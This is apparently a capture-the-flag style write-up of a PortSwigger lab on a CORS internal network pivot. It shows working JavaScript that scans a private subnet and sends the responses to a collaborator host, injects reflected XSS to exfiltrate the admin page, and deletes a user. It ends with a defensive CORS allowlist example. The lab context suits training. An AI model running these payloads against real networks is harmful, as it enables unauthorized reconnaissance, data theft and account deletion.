
CORS vulnerability with internal network pivot attack

1. Find the IP on the internal network

```html
<html>
<script>
collaboratorURL = 'http://dvcnyp6xn7uyp5cunm7kadwxkoqfe62v.oastify.com'
// Sweep 192.168.0.0/24 for a web service on port 8080. The victim's browser
// makes the requests, and the permissive CORS policy lets the response be read.
for (let i = 0; i < 256; i++) {
  fetch('http://192.168.0.' + i + ':8080')
    .then(response => response.text())
    .then(text => {
      try {
        // Report the responding host and its page body to the collaborator.
        fetch(collaboratorURL + '?ip=' + 'http://192.168.0.' + i + '&code=' + encodeURIComponent(text))
      } catch (error) { }
    })
}
</script>
</html>
```

Paste into the Exploit Server -> Store -> Deliver exploit to victim
Found the IP 192.168.0.61 and the source code of the login page


```html
<!DOCTYPE html> <html> <head>
<link href=/resources/labheader/css/academyLabHeader.css rel=stylesheet>
<link href=/resources/css/labs.css rel=stylesheet>
<title>CORS vulnerability with internal network pivot attack</title>
</head> <body>
<script src="/resources/labheader/js/labHeader.js"></script>
<div id="academyLabHeader"> <section class='academyLabBanner'> <div class=container> <div class=logo></div> <div class=title-container>
<h2>CORS vulnerability with internal network pivot attack</h2>
<a id='exploit-link' class='button' target='_blank' href='http://exploit-0a350035044985a380c6488301bf00dd.exploit-server.net'>Go to exploit server</a>
<a class=link-back href='https://portswigger.net/web-security/cors/lab-internal-network-pivot-attack'> Back&nbsp;to&nbsp;lab&nbsp;description&nbsp; <svg version=1.1 id=Layer_1 xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' x=0px y=0px viewBox='0 0 28 30' enable-background='new 0 0 28 30' xml:space=preserve title=back-arrow> <g> <polygon points='1.4,0 0,1.2 12.6,15 0,28.8 1.4,30 15.1,15'></polygon> <polygon points='14.3,0 12.9,1.2 25.6,15 12.9,28.8 14.3,30 28,15'></polygon> </g> </svg> </a>
</div>
<div class='widgetcontainer-lab-status is-notsolved'> <span>LAB</span> <p>Not solved</p> <span class=lab-status-icon></span> </div>
</div> </div> </section> </div>
<div theme=""> <section class="maincontainer"> <div class="container is-page">
<header class="navigation-header"> <section class="top-links"> <a href=/>Home</a><p>|</p> <a href="/my-account">My account</a><p>|</p> </section> </header>
<header class="notification-header"> </header>
<h1>Login</h1>
<section>
<form class=login-form method=POST action="/login">
<input required type="hidden" name="csrf" value="DJv2phmih2CeooESDPNnQaTAGiT6kJkA">
<label>Username</label> <input required type=username name="username" autofocus>
<label>Password</label> <input required type=password name="password">
<button class=button type=submit> Log in </button>
</form>
</section> </div> </section>
<div class="footer-wrapper"> </div> </div> </body> </html>

<script src="/resources/labheader/js/labHeader.js"></script>
<div id="academyLabHeader"> <section class="academyLabBanner"> <div class="container"> <div class="logo"></div> <div class="title-container">
<h2>CORS vulnerability with internal network pivot attack</h2>
<a id="exploit-link" class="button" target="_blank" href="http://exploit-0a570057046a88af8136a3dc013f0019.exploit-server.net">Go to exploit server</a>
<a class="link-back" href="https://portswigger.net/web-security/cors/lab-internal-network-pivot-attack"> Back&nbsp;to&nbsp;lab&nbsp;description&nbsp; <svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" viewBox="0 0 28 30" enable-background="new 0 0 28 30" xml:space="preserve" title="back-arrow"> <g> <polygon points="1.4,0 0,1.2 12.6,15 0,28.8 1.4,30 15.1,15"></polygon> <polygon points="14.3,0 12.9,1.2 25.6,15 12.9,28.8 14.3,30 28,15"></polygon> </g> </svg> </a>
</div>
<div class="widgetcontainer-lab-status is-notsolved"> <span>LAB</span> <p>Not solved</p> <span class="lab-status-icon"></span> </div>
</div> </section></div>
<div theme=""> <section class="maincontainer"> <div class="container is-page">
<header class="navigation-header"> <section class="top-links"> <a href="/">Home</a><p>|</p> <a href="/admin">Admin panel</a><p>|</p> <a href="/my-account?id=administrator">My account</a><p>|</p> </section> </header>
<header class="notification-header"> </header>
<form style="margin-top: 1em" class="login-form" action="/admin/delete" method="POST">
<input required="" type="hidden" name="csrf" value="ueASHsgFO6MbB8TLaTjSw38sZe3Opiex">
<label>Username</label> <input required="" type="text" name="username">
<button class="button" type="submit">Delete user</button>
</form>
</div> </section>
<div class="footer-wrapper"> </div> </div>

<!DOCTYPE html> <html> <head>
<link href=/resources/labheader/css/academyLabHeader.css rel=stylesheet>
<link href=/resources/css/labs.css rel=stylesheet>
<title>CORS vulnerability with internal network pivot attack</title>
</head> <body>
<script src="/resources/labheader/js/labHeader.js"></script>
<div id="academyLabHeader"> <section class='academyLabBanner'> <div class=container> <div class=logo></div> <div class=title-container>
<h2>CORS vulnerability with internal network pivot attack</h2>
<a id='exploit-link' class='button' target='_blank' href='http://exploit-0a570057046a88af8136a3dc013f0019.exploit-server.net'>Go to exploit server</a>
<a class=link-back href='https://portswigger.net/web-security/cors/lab-internal-network-pivot-attack'> Back&nbsp;to&nbsp;lab&nbsp;description&nbsp; <svg version=1.1 id=Layer_1 xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' x=0px y=0px viewBox='0 0 28 30' enable-background='new 0 0 28 30' xml:space=preserve title=back-arrow> <g> <polygon points='1.4,0 0,1.2 12.6,15 0,28.8 1.4,30 15.1,15'></polygon> <polygon points='14.3,0 12.9,1.2 25.6,15 12.9,28.8 14.3,30 28,15'></polygon> </g> </svg> </a>
</div>
<div class='widgetcontainer-lab-status is-notsolved'> <span>LAB</span> <p>Not solved</p> <span class=lab-status-icon></span> </div>
</div> </div> </section> </div>
<div theme=""> <section class="maincontainer"> <div class="container is-page">
<header class="navigation-header"> <section class="top-links"> <a href=/>Home</a><p>|</p> <a href="/my-account">My account</a><p>|</p> </section> </header>
<header class="notification-header"> </header>
<h1>Login</h1>
<section>
<form class=login-form method=POST action="/login">
<input required type="hidden" name="csrf" value="2xFL2jEGadxJODxw5C8v7ym927N4SZfj">
<label>Username</label> <input required type=username name="username" autofocus>
<label>Password</label> <input required type=password name="password">
<button class=button type=submit> Log in </button>
</form>
</section> </div> </section>
<div class="footer-wrapper"> </div> </div> </body> </html>
```

Extract the csrf token with a regex


2. Check whether the username field is vulnerable to XSS

```html
<html>
<script>
collaboratorURL = 'http://dvcnyp6xn7uyp5cunm7kadwxkoqfe62v.oastify.com'
url = 'http://192.168.0.61:8080'
fetch(url)
  .then(response => response.text())
  .then(text => {
    try {
      // Probe payload: if the username is reflected unescaped, the browser loads the image
      // and the collaborator receives a hit with ?foundXSS=1.
      xss = '"><img src=' + collaboratorURL + '?foundXSS=1>';
      // [1] selects the captured token; match() alone returns the whole match array.
      login_path = '/login?username=' + encodeURIComponent(xss) + '&password=random&csrf=' + text.match(/csrf" value="([^"]+)"/)[1];
      location = url + login_path;
    } catch (error) { }
  })
</script>
</html>
```

Paste into the Exploit Server -> Store -> Deliver exploit to victim


-> The username field is vulnerable to XSS

3. Use the XSS to retrieve the admin page source

```html
<html>
<script>
collaboratorURL = 'http://dvcnyp6xn7uyp5cunm7kadwxkoqfe62v.oastify.com'
url = 'http://192.168.0.61:8080'
fetch(url)
  .then(response => response.text())
  .then(text => {
    try {
      // Same-origin iframe of /admin; once it loads, its body HTML is sent to the collaborator.
      xss = '"><iframe src=/admin onload="new Image().src=\'' + collaboratorURL + '?code=\'+encodeURIComponent(this.contentWindow.document.body.innerHTML)">';
      // [1] selects the captured token; match() alone returns the whole match array.
      login_path = '/login?username=' + encodeURIComponent(xss) + '&password=random&csrf=' + text.match(/csrf" value="([^"]+)"/)[1];
      location = url + login_path;
    } catch (error) { }
  })
</script>
</html>
```

Paste into the Exploit Server -> Store -> Deliver exploit to victim


Retrieved the admin page source

```html
<!DOCTYPE html> <html> <head>
<link href=/resources/labheader/css/academyLabHeader.css rel=stylesheet>
<link href=/resources/css/labs.css rel=stylesheet>
<title>CORS vulnerability with internal network pivot attack</title>
</head> <body>
<script src="/resources/labheader/js/labHeader.js"></script>
<div id="academyLabHeader"> <section class='academyLabBanner'> <div class=container> <div class=logo></div> <div class=title-container>
<h2>CORS vulnerability with internal network pivot attack</h2>
<a id='exploit-link' class='button' target='_blank' href='http://exploit-0a350035044985a380c6488301bf00dd.exploit-server.net'>Go to exploit server</a>
<a class=link-back href='https://portswigger.net/web-security/cors/lab-internal-network-pivot-attack'> Back&nbsp;to&nbsp;lab&nbsp;description&nbsp; <svg version=1.1 id=Layer_1 xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' x=0px y=0px viewBox='0 0 28 30' enable-background='new 0 0 28 30' xml:space=preserve title=back-arrow> <g> <polygon points='1.4,0 0,1.2 12.6,15 0,28.8 1.4,30 15.1,15'></polygon> <polygon points='14.3,0 12.9,1.2 25.6,15 12.9,28.8 14.3,30 28,15'></polygon> </g> </svg> </a>
</div>
<div class='widgetcontainer-lab-status is-notsolved'> <span>LAB</span> <p>Not solved</p> <span class=lab-status-icon></span> </div>
</div> </div> </section> </div>
<div theme=""> <section class="maincontainer"> <div class="container is-page">
<header class="navigation-header"> <section class="top-links"> <a href=/>Home</a><p>|</p> <a href="/my-account">My account</a><p>|</p> </section> </header>
<header class="notification-header"> </header>
<h1>Login</h1>
<section>
<form class=login-form method=POST action="/login">
<input required type="hidden" name="csrf" value="DJv2phmih2CeooESDPNnQaTAGiT6kJkA">
<label>Username</label> <input required type=username name="username" autofocus>
<label>Password</label> <input required type=password name="password">
<button class=button type=submit> Log in </button>
</form>
</section> </div> </section>
<div class="footer-wrapper"> </div> </div> </body> </html>

<script src="/resources/labheader/js/labHeader.js"></script>
<div id="academyLabHeader"> <section class="academyLabBanner"> <div class="container"> <div class="logo"></div> <div class="title-container">
<h2>CORS vulnerability with internal network pivot attack</h2>
<a id="exploit-link" class="button" target="_blank" href="http://exploit-0a570057046a88af8136a3dc013f0019.exploit-server.net">Go to exploit server</a>
<a class="link-back" href="https://portswigger.net/web-security/cors/lab-internal-network-pivot-attack"> Back&nbsp;to&nbsp;lab&nbsp;description&nbsp; <svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" viewBox="0 0 28 30" enable-background="new 0 0 28 30" xml:space="preserve" title="back-arrow"> <g> <polygon points="1.4,0 0,1.2 12.6,15 0,28.8 1.4,30 15.1,15"></polygon> <polygon points="14.3,0 12.9,1.2 25.6,15 12.9,28.8 14.3,30 28,15"></polygon> </g> </svg> </a>
</div>
<div class="widgetcontainer-lab-status is-notsolved"> <span>LAB</span> <p>Not solved</p> <span class="lab-status-icon"></span> </div>
</div> </section></div>
<div theme=""> <section class="maincontainer"> <div class="container is-page">
<header class="navigation-header"> <section class="top-links"> <a href="/">Home</a><p>|</p> <a href="/admin">Admin panel</a><p>|</p> <a href="/my-account?id=administrator">My account</a><p>|</p> </section> </header>
<header class="notification-header"> </header>
<form style="margin-top: 1em" class="login-form" action="/admin/delete" method="POST">
<input required="" type="hidden" name="csrf" value="ueASHsgFO6MbB8TLaTjSw38sZe3Opiex">
<label>Username</label> <input required="" type="text" name="username">
<button class="button" type="submit">Delete user</button>
</form>
</div> </section>
<div class="footer-wrapper"> </div> </div>
```

4. Use the XSS to delete the user carlos

```html
<html>
<script>
collaboratorURL = 'http://dvcnyp6xn7uyp5cunm7kadwxkoqfe62v.oastify.com'
url = 'http://192.168.0.61:8080'
fetch(url)
  .then(response => response.text())
  .then(text => {
    try {
      // Same-origin iframe of /admin; fill the delete form's username with carlos and submit it.
      xss = '"><iframe src=/admin onload="var f=this.contentWindow.document.forms[0];if(f.username)f.username.value=\'carlos\',f.submit()">';
      // [1] selects the captured token; match() alone returns the whole match array.
      login_path = '/login?username=' + encodeURIComponent(xss) + '&password=random&csrf=' + text.match(/csrf" value="([^"]+)"/)[1];
      location = url + login_path;
    } catch (error) { }
  })
</script>
</html>
```

Paste into the Exploit Server -> Store -> Deliver exploit to victim -> Solved.
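The cross-origin read in step 1 only succeeds because the internal service answers any Origin with a matching Access-Control-Allow-Origin header. As an added example (not from the lab or this write-up), the reflect-any-origin policy is shown beside an exact-match allowlist, with a helper that mimics the browser's read decision; the trusted origin and the attacker origin are assumed placeholders.

```javascript
// Added example, not from the lab or the write-up. The scan in step 1 can read
// the internal service's response because its CORS policy trusts any Origin.
// Two policies are compared as plain functions so the difference is testable.

// Weak policy: reflect whatever Origin the browser sent. Any page the victim
// visits, including an attacker-controlled one, can then read the response.
function corsHeadersReflectAny(origin) {
  if (!origin) return {};
  return { 'Access-Control-Allow-Origin': origin };
}

// Hardened policy: exact-match allowlist. Unknown origins, the literal 'null'
// origin and look-alike hosts get no CORS headers at all, so the browser
// refuses to hand the response body to the calling page.
const TRUSTED_ORIGINS = new Set([
  'https://intranet.example.internal', // assumed placeholder for a real trusted origin
]);

function corsHeadersAllowlist(origin) {
  if (!origin || !TRUSTED_ORIGINS.has(origin)) return {};
  return {
    'Access-Control-Allow-Origin': origin,
    'Vary': 'Origin', // keep caches from serving one origin's headers to another
  };
}

// Mimics the browser's decision for a credential-less fetch like the one in
// step 1: the body is readable only if ACAO is '*' or equals the caller's origin.
function readableFrom(headers, callerOrigin) {
  const acao = headers['Access-Control-Allow-Origin'];
  return acao === '*' || acao === callerOrigin;
}

// Quick demonstration with a constructed attacker origin.
function demo() {
  const attacker = 'http://exploit-attacker.example'; // constructed, not a real host
  return {
    weakReadable: readableFrom(corsHeadersReflectAny(attacker), attacker),    // true
    hardenedReadable: readableFrom(corsHeadersAllowlist(attacker), attacker), // false
  };
}
```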